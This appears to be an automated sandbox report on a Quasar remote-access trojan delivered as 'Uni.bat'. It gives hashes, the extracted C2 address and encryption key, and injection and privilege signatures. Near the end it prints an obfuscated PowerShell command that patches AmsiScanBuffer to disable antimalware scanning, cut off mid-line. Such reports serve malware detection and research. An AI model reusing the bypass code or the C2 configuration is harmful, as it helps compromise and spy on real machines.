Analysis
-
max time kernel
300s -
max time network
207s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
14-05-2024 20:29
Static task
static1
Behavioral task
behavioral1
Sample
Uni.bat
Resource
win10-20240404-en
Behavioral task
behavioral2
Sample
Uni.bat
Resource
win10v2004-20240426-en
General
-
Target
Uni.bat
-
Size
513KB
-
MD5
2f2f86a8f6be8fa6b37bd49bcd660a75
-
SHA1
f7006941a8cbf7a663e9fa379f75ccd5afedd730
-
SHA256
3798ed2ce7d93b63c0e5670d610809c6b73ddf556968b58446ae8b62c027354c
-
SHA512
5f253dd977ff725bab54ddd45bcdbd213587b55a376446a9db2c68bc097e97ad7a61019156449f65e329b9b51f8de3dfa077aa093787fc037d1c5c92252334fb
-
SSDEEP
12288:CnVOnWW4/Qczes8bGOvfKS2k3+0RVNN0VVjKgGt:CnVOno/QcN8bG4fKHkBRVn4KR
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-AidubAN29rBfWYM23w
-
encryption_key
GNF1G2eu7MrbS69M7a4f
-
install_name
Client.exe
-
log_directory
$SXR-LOGS
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Signatures
-
Quasar payload 1 IoCs
Processes:
resource yara_rule behavioral3/memory/1824-76-0x00000000077B0000-0x000000000781C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4024 created 628 4024 powershell.EXE winlogon.exe PID 2780 created 628 2780 powershell.EXE winlogon.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exeflow pid process 2 1824 powershell.exe 3 1824 powershell.exe 5 1824 powershell.exe 6 1824 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepid process 2592 powershell.exe 980 powershell.exe 1824 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
install.exeinstall.exepid process 4512 install.exe 1512 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 8 IoCs
Processes:
svchost.exesvchost.exepowershell.EXEOfficeClickToRun.exepowershell.EXEdescription ioc process File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\$77svc64 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4024 set thread context of 2808 4024 powershell.EXE dllhost.exe PID 2780 set thread context of 4360 2780 powershell.EXE dllhost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
OfficeClickToRun.exepowershell.EXEpowershell.EXEsvchost.exedescription ioc process Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR OfficeClickToRun.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0 OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Tue, 14 May 2024 20:31:48 GMT" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={82EAD5DE-CD61-4576-A2D0-391FAFAA58D9}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1715718707" OfficeClickToRun.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3062789476-783164490-2318012559-1000_Classes\Local Settings powershell.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEdllhost.exepid process 2592 powershell.exe 2592 powershell.exe 980 powershell.exe 980 powershell.exe 1824 powershell.exe 1824 powershell.exe 4024 powershell.EXE 4024 powershell.EXE 4024 powershell.EXE 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 1824 powershell.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe 2808 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2592 powershell.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeIncreaseQuotaPrivilege 980 powershell.exe Token: SeSecurityPrivilege 980 powershell.exe Token: SeTakeOwnershipPrivilege 980 powershell.exe Token: SeLoadDriverPrivilege 980 powershell.exe Token: SeSystemProfilePrivilege 980 powershell.exe Token: SeSystemtimePrivilege 980 powershell.exe Token: SeProfSingleProcessPrivilege 980 powershell.exe Token: SeIncBasePriorityPrivilege 980 powershell.exe Token: SeCreatePagefilePrivilege 980 powershell.exe Token: SeBackupPrivilege 980 powershell.exe Token: SeRestorePrivilege 980 powershell.exe Token: SeShutdownPrivilege 980 powershell.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeSystemEnvironmentPrivilege 980 powershell.exe Token: SeRemoteShutdownPrivilege 980 powershell.exe Token: SeUndockPrivilege 980 powershell.exe Token: SeManageVolumePrivilege 980 powershell.exe Token: 33 980 powershell.exe Token: 34 980 powershell.exe Token: 35 980 powershell.exe Token: 36 980 powershell.exe Token: SeIncreaseQuotaPrivilege 980 powershell.exe Token: SeSecurityPrivilege 980 powershell.exe Token: SeTakeOwnershipPrivilege 980 powershell.exe Token: SeLoadDriverPrivilege 980 powershell.exe Token: SeSystemProfilePrivilege 980 powershell.exe Token: SeSystemtimePrivilege 980 powershell.exe Token: SeProfSingleProcessPrivilege 980 powershell.exe Token: SeIncBasePriorityPrivilege 980 powershell.exe Token: SeCreatePagefilePrivilege 980 powershell.exe Token: SeBackupPrivilege 980 powershell.exe Token: SeRestorePrivilege 980 powershell.exe Token: SeShutdownPrivilege 980 powershell.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeSystemEnvironmentPrivilege 980 powershell.exe Token: SeRemoteShutdownPrivilege 980 powershell.exe Token: SeUndockPrivilege 980 powershell.exe Token: SeManageVolumePrivilege 980 powershell.exe Token: 33 980 powershell.exe Token: 34 980 powershell.exe Token: 35 980 powershell.exe Token: 36 980 powershell.exe Token: SeIncreaseQuotaPrivilege 980 powershell.exe Token: SeSecurityPrivilege 980 powershell.exe Token: SeTakeOwnershipPrivilege 980 powershell.exe Token: SeLoadDriverPrivilege 980 powershell.exe Token: SeSystemProfilePrivilege 980 powershell.exe Token: SeSystemtimePrivilege 980 powershell.exe Token: SeProfSingleProcessPrivilege 980 powershell.exe Token: SeIncBasePriorityPrivilege 980 powershell.exe Token: SeCreatePagefilePrivilege 980 powershell.exe Token: SeBackupPrivilege 980 powershell.exe Token: SeRestorePrivilege 980 powershell.exe Token: SeShutdownPrivilege 980 powershell.exe Token: SeDebugPrivilege 980 powershell.exe Token: SeSystemEnvironmentPrivilege 980 powershell.exe Token: SeRemoteShutdownPrivilege 980 powershell.exe Token: SeUndockPrivilege 980 powershell.exe Token: SeManageVolumePrivilege 980 powershell.exe Token: 33 980 powershell.exe Token: 34 980 powershell.exe Token: 35 980 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
powershell.exepid process 1824 powershell.exe -
Suspicious use of UnmapMainImage 2 IoCs
Processes:
RuntimeBroker.exeExplorer.EXEpid process 3792 RuntimeBroker.exe 3284 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exepowershell.exeWScript.execmd.exepowershell.exepowershell.EXEdllhost.exedescription pid process target process PID 3456 wrote to memory of 2592 3456 cmd.exe powershell.exe PID 3456 wrote to memory of 2592 3456 cmd.exe powershell.exe PID 3456 wrote to memory of 2592 3456 cmd.exe powershell.exe PID 2592 wrote to memory of 980 2592 powershell.exe powershell.exe PID 2592 wrote to memory of 980 2592 powershell.exe powershell.exe PID 2592 wrote to memory of 980 2592 powershell.exe powershell.exe PID 2592 wrote to memory of 3572 2592 powershell.exe WScript.exe PID 2592 wrote to memory of 3572 2592 powershell.exe WScript.exe PID 2592 wrote to memory of 3572 2592 powershell.exe WScript.exe PID 3572 wrote to memory of 888 3572 WScript.exe cmd.exe PID 3572 wrote to memory of 888 3572 WScript.exe cmd.exe PID 3572 wrote to memory of 888 3572 WScript.exe cmd.exe PID 888 wrote to memory of 1824 888 cmd.exe powershell.exe PID 888 wrote to memory of 1824 888 cmd.exe powershell.exe PID 888 wrote to memory of 1824 888 cmd.exe powershell.exe PID 1824 wrote to memory of 4512 1824 powershell.exe install.exe PID 1824 wrote to memory of 4512 1824 powershell.exe install.exe PID 1824 wrote to memory of 4512 1824 powershell.exe install.exe PID 4024 wrote to memory of 2808 4024 powershell.EXE dllhost.exe PID 4024 wrote to memory of 2808 4024 powershell.EXE dllhost.exe PID 4024 wrote to memory of 2808 4024 powershell.EXE dllhost.exe PID 4024 wrote to memory of 2808 4024 powershell.EXE dllhost.exe PID 4024 wrote to memory of 2808 4024 powershell.EXE dllhost.exe PID 4024 wrote to memory of 2808 4024 powershell.EXE dllhost.exe PID 4024 wrote to memory of 2808 4024 powershell.EXE dllhost.exe PID 4024 wrote to memory of 2808 4024 powershell.EXE dllhost.exe PID 2808 wrote to memory of 628 2808 dllhost.exe winlogon.exe PID 2808 wrote to memory of 684 2808 dllhost.exe lsass.exe PID 2808 wrote to memory of 984 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 444 2808 dllhost.exe dwm.exe PID 2808 wrote to memory of 700 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 624 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1028 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1080 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1208 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1216 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1260 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1344 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1424 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1436 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1520 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1532 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1548 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1716 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1756 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1768 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1836 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1896 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1904 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 1924 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2012 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2024 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2088 2808 dllhost.exe spoolsv.exe PID 2808 wrote to memory of 2204 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2416 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2508 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2516 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2556 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2644 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2660 2808 dllhost.exe sysmon.exe PID 2808 wrote to memory of 2692 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2700 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 2728 2808 dllhost.exe svchost.exe PID 2808 wrote to memory of 3064 2808 dllhost.exe sihost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵PID:628
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵PID:444
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{736aba27-588e-4ed2-bc88-afea21b1cce6}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2808 -
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{f26246fa-cba5-4e27-9f75-5fb7778cc773}2⤵PID:4360
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵PID:984
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵PID:700
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵PID:624
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1028
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1080
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1208
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
- Drops file in System32 directory
PID:1216 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:CGCGBIpKSWUA{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$XxBMyAxTrIzdeC,[Parameter(Position=1)][Type]$StwyWkukNu)$WYAbJLNFsDV=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+[Char](101)+'ct'+[Char](101)+''+[Char](100)+''+'D'+''+'e'+''+[Char](108)+'e'+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+''+[Char](110)+''+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+'r'+''+[Char](121)+'M'+'o'+'d'+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+'D'+''+'e'+'l'+[Char](101)+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+'C'+''+'l'+''+[Char](97)+'ss,'+'P'+'u'+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+'e'+'a'+'l'+'e'+[Char](100)+''+[Char](44)+'A'+'n'+'si'+[Char](67)+'l'+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+'oC'+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+'',[MulticastDelegate]);$WYAbJLNFsDV.DefineConstructor(''+[Char](82)+''+'T'+'S'+'p'+''+'e'+'c'+[Char](105)+''+[Char](97)+''+[Char](108)+''+'N'+''+'a'+'m'+[Char](101)+''+','+''+'H'+''+[Char](105)+''+'d'+''+'e'+''+'B'+''+'y'+''+'S'+''+[Char](105)+''+'g'+''+','+''+'P'+''+'u'+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$XxBMyAxTrIzdeC).SetImplementationFlags(''+[Char](82)+'u'+[Char](110)+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');$WYAbJLNFsDV.DefineMethod(''+'I'+''+[Char](110)+'v'+[Char](111)+''+[Char](107)+'e',''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'de'+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+'e'+[Char](119)+''+[Char](83)+''+'l'+'o'+[Char](116)+''+','+'V'+[Char](105)+''+[Char](114)+''+'t'+''+[Char](117)+''+'a'+''+[Char](108)+'',$StwyWkukNu,$XxBMyAxTrIzdeC).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+'t'+[Char](105)+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');Write-Output $WYAbJLNFsDV.CreateType();}$eiWkKigphEybv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+[Char](115)+''+'t'+''+'e'+''+[Char](109)+''+[Char](46)+''+[Char](100)+''+[Char](108)+'l')}).GetType('M'+[Char](105)+'c'+[Char](114)+''+'o'+'so'+[Char](102)+''+'t'+'.'+[Char](87)+'i'+[Char](110)+'32'+'.'+''+'U'+''+[Char](110)+''+'s'+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+'a'+'t'+[Char](105)+''+[Char](118)+''+'e'+''+[Char](77)+'e'+[Char](116)+''+[Char](104)+'o'+'d'+''+'s'+'');$nrKPhbxKTwYdPM=$eiWkKigphEybv.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+'ro'+'c'+''+[Char](65)+''+[Char](100)+'dre'+'s'+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+'c'+','+''+'S'+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$MrrTwKEANwmXyChbUKK=CGCGBIpKSWUA @([String])([IntPtr]);$QWHGNWpQFNGlkDnYorNDaN=CGCGBIpKSWUA @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$hGIWfGHpvSo=$eiWkKigphEybv.GetMethod('G'+[Char](101)+''+'t'+'M'+'o'+'d'+[Char](117)+''+[Char](108)+''+'e'+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+'n'+[Char](101)+'l'+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$WihejhstGVnuCp=$nrKPhbxKTwYdPM.Invoke($Null,@([Object]$hGIWfGHpvSo,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+'Li'+[Char](98)+''+'r'+''+[Char](97)+'r'+[Char](121)+'A')));$dAfVqlkRkoJKGkSxr=$nrKPhbxKTwYdPM.Invoke($Null,@([Object]$hGIWfGHpvSo,[Object](''+[Char](86)+'i'+[Char](114)+''+'t'+'u'+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+'ec'+[Char](116)+'')));$MeRzjiB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($WihejhstGVnuCp,$MrrTwKEANwmXyChbUKK).Invoke(''+[Char](97)+''+[Char](109)+''+'s'+''+[Char](105)+''+[Char](46)+''+[Char](100)+'ll');$sQvRJscRDuYPdqYbY=$nrKPhbxKTwYdPM.Invoke($Null,@([Object]$MeRzjiB,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+'S'+''+[Char](99)+''+[Char](97)+'nB'+'u'+''+'f'+''+[Char](102)+'e'+[Char](114)+'')));$kKzZeCrkMe=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dAfVqlkRkoJKGkSxr,$QWHGNWpQFNGlkDnYorNDaN).Invoke($sQvRJscRDuYPdqYbY,[uint32]8,4,[ref]$kKzZeCrkMe);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$sQvRJscRDuYPdqYbY,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($dAfVqlk